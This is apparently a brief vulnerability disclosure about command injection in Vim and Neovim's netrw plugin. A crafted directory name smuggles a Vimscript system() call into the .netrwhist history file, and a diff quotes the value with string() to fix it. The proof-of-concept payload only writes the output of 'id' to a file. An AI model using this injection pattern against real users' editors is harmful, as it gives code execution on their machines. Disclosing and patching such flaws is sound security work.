The bug
The same chain fires through vscode-neovim.
The crafted directory name
assets'|call system('id>PWNED.txt')|let x='
What netrw writes to .netrwhist, with the injected part highlighted
let g:netrw_dirhist_1='/home/victim/totally-normal-project/assets'|call system('id>PWNED.txt')|let x=''
The vulnerable line and the fix in s:NetrwBookHistSave()
- call setline(lastline,'let g:netrw_dirhist_'.cnt."='".g:netrw_dirhist_{cnt}."'")+ call setline(lastline,'let g:netrw_dirhist_'.cnt."=".string(g:netrw_dirhist_{cnt}))
Fixed in vim 9.2.0495, still in Neovim v0.12.5. It needs two directory-browse actions.